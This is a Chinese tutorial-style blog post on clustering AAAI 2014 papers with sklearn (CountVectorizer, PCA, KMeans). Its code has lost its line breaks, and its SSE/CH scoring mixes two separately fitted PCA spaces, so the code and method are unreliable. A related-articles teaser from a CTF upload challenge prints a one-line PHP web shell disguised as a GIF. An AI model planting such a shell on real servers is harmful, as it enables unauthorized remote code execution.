【機器學習】實驗5,AAAI 會議論文聚類分析

本次實驗以AAAI 2014會議論文數據為基礎,要求實現或調用無監督聚類算法,了解聚類方法。

任務介紹

每年國際上召開的大大小小學術會議不計其數,發表了非常多的論文。在計算機領域的一些大型學術會議上,一次就可以發表涉及各個方向的幾百篇論文。按論文的主題、內容進行聚類,有助于人們高效地查找和獲得所需要的論文。本案例數據來源于AAAI 2014上發表的約400篇文章,由UCI公開提供,提供包括標題、作者、關鍵詞、摘要在內的信息,希望大家能根據這些信息,合理地構造特征向量來表示這些論文,并設計實現或調用聚類算法對論文進行聚類。最后也可以對聚類結果進行觀察,看每一類都是什么樣的論文,是否有一些主題。

基本要求:

  1. 將文本轉化為向量,實現或調用無監督聚類算法,對論文聚類,例如10類(可使用已有工具包例如sklearn);

  2. 觀察每一類中的論文,調整算法使結果較為合理;

  3. 無監督聚類沒有標簽,效果較難評價,因此沒有硬性指標,跑通即可,主要讓大家了解和感受聚類算法,比較簡單。

擴展要求:

  1. 對文本向量進行降維,并將聚類結果可視化成散點圖。

注:group和topic也不能完全算是標簽,因為

  1. 有些文章作者投稿時可能會選擇某個group/topic但實際和另外group/topic也相關甚至更相關;

  2. 一篇文章可能有多個group和topic,作為標簽會出現有的文章同屬多個類別,這里暫不考慮這樣的聚類;

  3. group和topic的取值很多,但聚類常常希望指定聚合成出例如5/10/20類;

  4. 感興趣但同學可以思考利用group和topic信息來量化評價無監督聚類結果,不作要求。

提示:

  1. 高維向量的降維旨在去除一些高相關性的特征維度,保留最有用的信息,用更低維的向量表示高維數據,常用的方法有PCA和t-SNE等;

  2. 降維與聚類是兩件不同的事情,聚類實際上在降維前的高維向量和降維后的低維向量上都可以進行,結果也可能截然不同;

  3. 高維向量做聚類,降維可視化后若有同一類的點不在一起,是正常的。在高維空間中它們可能是在一起的,降維后損失了一些信息

實驗結果?

from sklearn.feature_extraction.text import  CountVectorizer
from sklearn.metrics import  calinski_harabasz_score
from sklearn.decomposition import PCA
from sklearn.cluster import KMeans
import pandas as pd
import numpy as npdef load_data(path='data/[UCI] AAAI-14 Accepted Papers - Papers.csv'):df_data = pd.read_csv(path)df_data = df_data.dropna()return df_datadf = load_data()
df.describe() 
# 去除不好的特征
df_selected = df.drop(['groups', 'topics'], axis=1)
cv = CountVectorizer()
X_features = np.array([[i] for i in range(df.shape[0])])for col in df_selected.columns:tmp = cv.fit_transform(df_selected[col].tolist())feature = tmp.toarray()X_features = np.concatenate((X_features, feature), axis=1)print("特征矩陣的形狀:", X_features.shape)

?特征矩陣的形狀: (392, 9899)

# 取出group和topics特征作為評價指標
df_cls = df[['groups', 'topics']]
cv = CountVectorizer()
X_cls = [[i] for i in range(df.shape[0])]
for col in df_cls.columns:tmp = cv.fit_transform(df_cls[col])feature = tmp.toarray()X_cls = np.concatenate((X_cls, feature), axis=1)

SSE(Sum of Squared Errors)測量聚類結果中每個樣品與所屬聚類中心距離的平方和。SSE越小,聚類樣品越致密,聚類效果越好。SSE是衡量簇內密度的指標,越小越好。

CH指標(Calinski-HarabaszIndex)是綜合考慮集群內密度和集群間分辨率的指標。計算集群間分散度與集群內密度之比。CH指標越大,集群之間的距離越大,集群內的距離越小,集群效果越好。

for pca_num in [2, 5, 7, 10, 30]:X_pca = PCA(n_components=pca_num).fit_transform(X_features)X_cs = PCA(n_components=pca_num).fit_transform(X_cls)print(X_pca.shape)for k in range(5, 16):kmeans = KMeans(n_clusters=k)labels = kmeans.fit_predict(X_pca)# 獲取聚類中心centroids = kmeans.cluster_centers_# 計算每個樣本與所屬簇中心的距離的平方distances = np.sum((X_cs - centroids[labels])**2, axis=1)# 計算 SSEsse = np.sum(distances)# CH指標ch = calinski_harabasz_score(X_cs, labels)score = sse/chprint('k:', k, 'ch:', ch, 'SSE:', sse, 'score:', score)

從結果可以看出降維度在2,k為15的時候聚類效果更好。這里我用了sse和ch的比值作為成績,越小證明聚類效果越好。?

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/716359.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/716359.shtml
英文地址,請注明出處:http://en.pswp.cn/news/716359.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

RNA-Seq 筆記 [4]

***********************該筆記為初學者筆記,僅供個人參考謹慎搬運代碼****************************** samtools 排序壓縮和 featureCounts 生成基因計數表 SAM文件和BAM文件 1.SAM格式:是一種通用的比對格式,用來存儲reads到參考序列的比…

2024最新算法:鳑鲏魚優化算法(Bitterling Fish Optimization,BFO)求解23個基準函數(提供MATLAB代碼)

一、鳑鲏魚優化算法 鳑鲏魚優化算法(Bitterling Fish Optimization,BFO)由Lida Zareian 等人于2024年提出。鳑鲏魚在交配中,雄性和雌性物種相互接近,然后將精子和卵子釋放到水中,但這種方法有一個很大的缺…

BUUCTF---[極客大挑戰 2019]Upload1

1.題目描述 2.點開鏈接&#xff0c;需要上傳文件&#xff0c;要求是image&#xff0c;上傳文件后綴為jpg的一句話木馬&#xff0c;發現被檢測到了 3.換另一個木馬試試 GIF89a? <script language"php">eval($_REQUEST[1])</script> 發現可以上傳成功 4…

ctf_show筆記篇(web入門---文件包含)

目錄 文件包含 78-79&#xff1a;最基礎的文件包含&#xff0c;使用偽協議&#xff0c;大小寫繞過或者通配符繞過&#xff0c;再或者使用其他方法 ?編輯80-81&#xff1a;可采用日志文件繞過或者大小寫繞過&#xff08;81只能日志文件繞過&#xff09; ####80-86&#xff1…

『周年紀念』- 降生CSDN三周年的碎碎念

『周年紀念』- 降生CSDN三周年的碎碎念 緣起機緣迷茫厚積薄發 一轉眼又過來一年&#xff0c;自己也已經 大四即將畢業。 感覺這一年像是開了加速鍵&#xff0c;仿佛一瞬就又過去了。統計了一下發現自己在過去的這一年就發布了 2篇文章&#xff0c;2022年發布了 117篇&#x…

PDF 解析問題調研

說點真實的感受 &#xff1a;網上看啥組件都好&#xff0c;實際測&#xff0c;啥組件都不行。效果好的不開源收費&#xff0c;開源的效果不好。測試下來&#xff0c;發現把組件融合起來&#xff0c;還是能不花錢解決問題的&#xff0c;都是麻煩折騰一些。 這里分享了目前網上能…

Python中的反射

在Python中&#xff0c;反射&#xff08;Reflection&#xff09;是一種動態地訪問對象和調用其方法的能力&#xff0c;而不需要在編寫代碼時顯式地知道對象的類或屬性。這種機制使得代碼具有更高的靈活性和可擴展性。Python通過幾種內置函數提供了反射的功能&#xff0c;主要包…

機器學習中類別不平衡問題的解決方案

類別不平衡問題 解決方案簡單方法收集數據調整權重閾值移動 數據層面欠采樣過采樣采樣方法的優劣 算法層面代價敏感集成學習&#xff1a;EasyEnsemble 總結 類別不平衡&#xff08;class-imbalance&#xff09;就是指分類任務中不同類別的訓練樣例數目差別很大的情況 解決方案…

智能分析網關V4電瓶車檢測與煙火算法,全面提升小區消防安全水平

2024年2月23日&#xff0c;南京市某小區因電瓶車停放處起火引發火災事故&#xff0c;造成巨大人員傷亡和損失。根據國家消防救援局的統計&#xff0c;2023年全國共接報電動自行車火災2.1萬起。電瓶車火災事故頻發&#xff0c;這不得不引起我們的重視和思考&#xff0c;尤其是在…

阿里云A10推理qwen

硬件配置 vCPU&#xff1a;32核 內存&#xff1a;188 GiB 寬帶&#xff1a;5 Mbps GPU&#xff1a;NVIDIA A10 24Gcuda 安裝 wget https://developer.download.nvidia.com/compute/cuda/12.1.0/local_installers/cuda-repo-rhel7-12-1-local-12.1.0_530.30.02-1.x86_64.rpm s…

ZDH-大數據采集-支持KETTLE任務

目錄 項目源碼 預覽地址 支持KETTLE介紹 新增KETTLE任務 配置調度KETTLE 重要說明 感謝支持 項目源碼 zdh_web:GitHub - zhaoyachao/zdh_web: 大數據采集,抽取平臺 預覽地址 后臺管理-登陸 用戶名&#xff1a;zyc 密碼&#xff1a;123456 支持KETTLE介紹 當前平臺不…

lv20 QT進程線程編程

知識點&#xff1a;啟動進程 &#xff0c;線程 &#xff0c;線程同步互斥 1 啟動進程 應用場景&#xff1a;通常在qt中打開另一個程序 process模板 QString program “/bin/ls"; QStringList arguments; arguments << "-l" << “-a";QPro…

手撕Java集合之簡易版Deque(LinkedList)

在目前&#xff0c;許多互聯網公司的面試已經要求能手撕集合源碼&#xff0c;集合源碼本身算是源碼里比較簡單的一部分&#xff0c;但是要在面試極短的10來分鐘內快速寫出一個簡易版的源碼還是比較麻煩的&#xff0c;很容易出現各種小問題。所以在平時就要注重這方面的聯系。 以…

倉儲自動化新解:托盤四向穿梭車駛入智能工廠 智能倉儲與產線緊密結合

目前&#xff0c;由于對倉庫存儲量的要求越來越高&#xff0c;揀選、輸送以及出入庫頻率等要求也越來越高&#xff0c;對此&#xff0c;在物流倉儲領域&#xff0c;自動化與智能化控制技術得以快速發展&#xff0c;貨架穿梭車在自動庫領域的應用越來越廣泛。現階段&#xff0c;…

linux之進程理解(1)

目錄 1. 馮諾依曼體系結構 2. 操作系統(OS) 2.1 概念 2.2 設計OS的目的 2.3 定位 2.4 理解管理 3. 系統調用和庫函數概念 4. 補充 1. 馮諾依曼體系結構 我們常見的計算機&#xff0c;如筆記本。我們不常見的計算機&#xff0c;如服務器&#xff0c;大部分都遵守馮諾依曼體…

chrome選項頁面options page配置

options 頁面用以定制Chrome瀏覽器擴展程序的運行參數。 通過Chrome 瀏覽器的“工具 ->更多工具->擴展程序”&#xff0c;打開chrome://extensions頁面&#xff0c;可以看到有的Google Chrome擴展程序有“選項Options”鏈接&#xff0c;如下圖所示。單擊“選項Options”…

制作鏡像與配置推送阿里云倉庫

一、制作jdk鏡像 1.1、Alpine linux簡介 Alpine Linux是一個輕量級的Linux發行版&#xff0c;專注于安全、簡潔和高效。它采用了musl libc和BusyBox&#xff0c;使得系統資源占用較少&#xff0c;啟動速度較快。 Alpine Linux也提供了一個簡單的包管理工具APK&#xff0c;(注…

【計算機網絡_應用層】協議定制序列化反序列化

文章目錄 1. TCP協議的通信流程2. 應用層協議定制3. 通過“網絡計算器”的實現來實現應用層協議定制和序列化3.1 protocol3.2 序列化和反序列化3.2.1 手寫序列化和反序列化3.2.2 使用Json庫 3.3 數據包讀取3.4 服務端設計3.5 最后的源代碼和運行結果 1. TCP協議的通信流程 在之…

深入分析Android運行時環境ART:原理、特點與優化策略

摘要 隨著移動互聯網的快速發展&#xff0c;智能手機的性能和功能日益強大&#xff0c;其中Android操作系統因其開放性和靈活性而占據主導地位。Android運行時環境&#xff08;ART&#xff09;作為執行應用程序代碼的關鍵組件&#xff0c;在系統性能和用戶體驗方面起著至關重要…

Vue+SpringBoot打造高校學生管理系統

目錄 一、摘要1.1 項目介紹1.2 項目錄屏 二、功能模塊2.1 學生管理模塊2.2 學院課程模塊2.3 學生選課模塊2.4 成績管理模塊 三、系統設計3.1 用例設計3.2 數據庫設計3.2.1 學生表3.2.2 學院課程表3.2.3 學生選課表3.2.4 學生成績表 四、系統展示五、核心代碼5.1 查詢課程5.2 新…